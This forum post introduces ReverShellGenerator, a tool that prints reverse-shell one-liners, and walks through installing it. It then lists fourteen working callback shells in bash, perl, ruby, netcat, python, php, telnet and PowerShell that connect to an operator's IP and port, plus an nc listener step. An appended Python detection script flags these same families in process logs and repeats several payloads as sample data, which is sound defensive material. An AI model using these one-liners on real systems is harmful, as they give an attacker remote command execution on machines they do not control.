ReverShellGenerator: one command gives you 14 one-line reverse shells

Persistence

#1

A tool that generates all sorts of reverse shells: ReverShellGenerator

### Download

git clone https://github.com/mthbernardes/rsg.git

### Install

cd rsg/
sudo chmod +x install.sh 
┌─[✗]─[parrot@parrot]─[~/Desktop/rsg]
└──╼ $sudo ./install.sh 
Collecting clint (from -r dependencies.txt (line 1))
  Downloading clint-0.5.1.tar.gz
Collecting args (from clint->-r dependencies.txt (line 1))
  Downloading args-0.1.0.tar.gz
Building wheels for collected packages: clint, args
  Running setup.py bdist_wheel for clint ... done
  Stored in directory: /root/.cache/pip/wheels/aa/65/4a/a0bceb0a6bee518b1dace4c803f24c4ac8febe55bdca0f14ed
  Running setup.py bdist_wheel for args ... done
  Stored in directory: /root/.cache/pip/wheels/0a/e0/66/35419f9f9ee41099a3631f0f308b9604bd1ffeabc066d69070
Successfully built clint args
Installing collected packages: args, clint
Successfully installed args-0.1.0 clint-0.5.1
Syntax Error:
python /usr/local/bin/rsg ip port
Example:
python /usr/local/bin/rsg 192.168.10.1 4444

## Usage

Usage is very simple.

Run

rsg [callback ip] [callback port]

and you get a set of reverse-shell one-liners, covering both Linux and Windows.

For example:

┌─[✗]─[parrot@parrot]─[~/Desktop/rsg]
└──╼ $rsg 192.168.1.1 4455
BASH REVERSE SHELL
bash -i >& /dev/tcp/192.168.1.1/4455 0>&1

BASH REVERSE SHELL
0<&196;exec 196<>/dev/tcp/192.168.1.1/4455; sh <&196 >&196 2>&196

PERL REVERSE SHELL
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

PERL REVERSE SHELL WINDOWS
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"192.168.1.1:4455");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

RUBY REVERSE SHELL
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

RUBY REVERSE SHELL
ruby -rsocket -e'f=TCPSocket.open("192.168.1.1",4455).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

RUBY REVERSE SHELL WINDOWS
ruby -rsocket -e 'c=TCPSocket.new("192.168.1.1","4455");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

NETCAT REVERSE SHELL
nc -c /bin/sh 192.168.1.1 4455

NETCAT REVERSE SHELL
/bin/sh | nc 192.168.1.1 4455

NETCAT REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.1 4455 0/tmp/p

PYTHON REVERSE SHELL
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP REVERSE SHELL
php -r '$sock=fsockopen("192.168.1.1",4455);exec("/bin/sh -i <&3 >&3 2>&3");'

TELNET REVERSE SHELL
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.1 4455 0/tmp/p

POWERSHELL REVERSE SHELL
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.1",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Select your payload, press any key to start the nc listener and send it to the target...

Pressing any key then starts an nc listener that waits for the connection back.
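Added example from the defender's side (Python; this is not code from the post or from the rsg project). Each family in the rsg output above leans on a distinctive socket or redirection idiom (`/dev/tcp/`, `mknod ... p && nc`, `dup2` followed by `/bin/sh`, `fsockopen` plus `exec`, `TCPClient` plus `iex`), which is exactly what makes them recognisable in process-creation telemetry. The script applies one regular expression per family to a constructed sample of process events (the `ts= host= user= cmd=` line format is hypothetical; the IP and port are the ones from the rsg output) and reports host, user, matched family and the callback address for each hit, so an analyst can block the egress destination.

```python
import re

# One regex per one-liner family rsg emits. They key on the socket/redirection idiom,
# not on a fixed IP or port, so hand-edited variants of the same templates still match.
REVERSE_SHELL_PATTERNS = [
    ("bash /dev/tcp redirect",      re.compile(r"/dev/(?:tcp|udp)/\S+/\d+")),
    ("perl IO::Socket + system",    re.compile(r"\bperl\b.*IO::Socket::INET.*\bsystem\b")),
    ("ruby TCPSocket + popen/exec", re.compile(r"\bruby\b.*TCPSocket\.(?:new|open).*\b(?:popen|exec)\b")),
    ("netcat -c/-e shell",          re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-[ce]\s+/bin/(?:ba)?sh")),
    ("shell piped into netcat",     re.compile(r"/bin/(?:ba)?sh\s*\|\s*(?:nc|ncat|netcat)\b")),
    ("named pipe + nc/telnet",      re.compile(r"\bmknod\s+\S+\s+p\b.*\b(?:nc|ncat|netcat|telnet)\b")),
    ("python socket dup2 + shell",  re.compile(r"\bpython\S*\s+-c\b.*\bsocket\b.*dup2.*/bin/(?:ba)?sh")),
    ("php fsockopen + exec",        re.compile(r"\bphp\s+-r\b.*fsockopen.*\bexec\b")),
    ("powershell TCPClient + iex",  re.compile(r"TCPClient\(.*GetStream\(\).*\biex\b", re.IGNORECASE)),
]

# Callback address as written in the one-liners: an IPv4 literal followed by a port,
# separated by "/", ":", a quote/comma pair or whitespace depending on the language.
C2_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[/:\",\s]+(\d{1,5})\b")

# Hypothetical process-event format (assumption); cmd= runs to end of line.
LINE_RE = re.compile(r"ts=(\S+)\s+host=(\S+)\s+user=(\S+)\s+cmd=(.*)$")

# Constructed sample telemetry, not real data. The flagged commands are the rsg
# one-liners shown above; the others are ordinary administrative activity.
SAMPLE_LOG = """\
ts=2024-05-01T10:00:01Z host=web01 user=www-data cmd=nginx: worker process
ts=2024-05-01T10:00:05Z host=web01 user=www-data cmd=php-fpm: pool www
ts=2024-05-01T10:01:12Z host=web01 user=www-data cmd=bash -i >& /dev/tcp/192.168.1.1/4455 0>&1
ts=2024-05-01T10:02:30Z host=db01 user=postgres cmd=python3 /opt/app/manage.py migrate
ts=2024-05-01T10:03:44Z host=db01 user=postgres cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4455));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
ts=2024-05-01T10:04:02Z host=ops01 user=admin cmd=nc -z localhost 22
ts=2024-05-01T10:04:50Z host=ops01 user=admin cmd=rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.1 4455 0/tmp/p
ts=2024-05-01T10:05:10Z host=win01 user=alice cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.1",4455);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)
"""


def classify(cmdline):
    """Labels of every reverse-shell family whose idiom appears in one command line."""
    return [label for label, rx in REVERSE_SHELL_PATTERNS if rx.search(cmdline)]


def extract_callback(cmdline):
    """Best-effort (ip, port) of the callback address embedded in a flagged command."""
    m = C2_RE.search(cmdline)
    return (m.group(1), int(m.group(2))) if m else None


def scan_log(text):
    """Parse key=value process events and return only those that look like reverse shells."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        ts, host, user, cmd = m.groups()
        labels = classify(cmd)
        if labels:
            hits.append({"ts": ts, "host": host, "user": user,
                         "indicators": labels,
                         "callback": extract_callback(cmd),
                         "cmd": cmd})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['host']} {h['user']} -> {h['callback']} "
              f"[{', '.join(h['indicators'])}]")
```

The patterns are written for execve/process-creation data (auditd, Sysmon event 1, EDR command lines); they match the plaintext templates rsg prints and nothing more, so an encoded PowerShell payload or a shell launched from a dropped script will not trip them. Treat them as one layer and pair them with egress monitoring for unexpected outbound connections from web or database service accounts, which is where all four hits in the sample originate.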


#2

There is also a similar article:

http://www.52bug.cn/黑客技术/3962.html

